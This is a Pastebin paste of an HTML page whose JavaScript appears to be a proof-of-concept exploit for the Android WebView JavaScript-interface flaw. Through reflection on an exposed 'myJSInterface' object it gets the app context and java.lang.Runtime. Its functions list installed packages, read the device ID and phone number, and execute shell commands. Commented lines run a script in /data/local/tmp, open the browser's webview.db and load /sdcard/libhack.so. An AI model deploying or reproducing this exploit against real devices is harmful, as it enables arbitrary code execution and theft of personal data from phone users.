Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <html>
- <body>
- <pre>
- log..
- <script type="text/javascript">
- function log(str) {
- document.write("" + str + "\n");
- }
- // log("start");
- // for (var key in document) {
- // log("" + key + ":" + document[key]);
- // }
- function dumpPackages(context) {
- var mypackagemanager = context.getPackageManager();
- var list = mypackagemanager.getInstalledApplications(8192);
- for (var x = 0; x < list.size(); x++) {
- log(list.get(x));
- }
- }
- function execShell(context, command) {
- var classLoader = context.getClass().getClassLoader();
- var clazz = classLoader.loadClass("java.lang.Runtime");
- log(clazz);
- var getRuntimeMethod = clazz.getMethod("getRuntime", {});
- log(getRuntimeMethod);
- var runtime = getRuntimeMethod.invoke(null, {});
- log(runtime);
- log(runtime.exec);
- // var process = runtime.exec(["ls", "-l", "/"]);
- // var process = runtime.exec(["/system/bin/sh", "/data/local/tmp/hoge.sh"]);
- // var process = runtime.exec(["am", "start", "-n", "com.google.android.browser/com.android.browser.BrowserActivity",
- // "file:///data/data/com.google.android.browser/databases/webview.db" ]);
- // runtime.exit(99);
- // runtime.halt(99);
- }
- function loadLib(context, libname) {
- var classLoader = context.getClass().getClassLoader();
- var clazz = classLoader.loadClass("java.lang.Runtime");
- log(clazz);
- var getRuntimeMethod = clazz.getMethod("getRuntime", {});
- log(getRuntimeMethod);
- var runtime = getRuntimeMethod.invoke(null, {});
- // runtime.exit(99);
- // runtime.halt(99);
- // runtime.load("/system/lib/libsqlite_jni.so");
- // runtime.load("/sdcard/libhack.so");
- // runtime.loadLibrary("sqlite_jni");
- // log(runtime.getMethod("exec", {classLoader.loadClass("java.lang.String")}));
- // log(runtime.getMethod("exec", {classLoader.loadClass("java.lang.String")}));
- // runtime.exec(command);
- }
- function getTelnum(context) {
- log("-- get Phone Number --");
- var classLoader = context.getClass().getClassLoader();
- var clazz = classLoader.loadClass("android.telephony.TelephonyManager");
- var preCast = context.getSystemService("phone");
- var telephonyManager = clazz.cast(preCast);
- log(telephonyManager);
- // var phoneNumber = telephonyManager.getLine1Number();
- log("hoge");
- var phoneNumber = telephonyManager.getDeviceId();
- log(phoneNumber);
- log("-- no need cast --");
- log(preCast.getLine1Number());
- }
- var myclass = myJSInterface.getClass();
- log("myclass = " + myclass);
- var classLoader = myclass.getClassLoader();
- log("myclass.getClassLoader: " + classLoader);
- var clazz = classLoader.loadClass("android.webkit.JniUtil");
- log("clazz: " + clazz);
- var myfield = clazz.getDeclaredField('sContext');
- myfield.setAccessible(true);
- var mycontext = myfield.get(clazz);
- log(mycontext);
- // dumpPackages(mycontext);
- // getTelnum(mycontext);
- // telNum(mycontest, "12345678");
- execShell(mycontext, "");
- </script>
- </pre>
- </body>
- </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement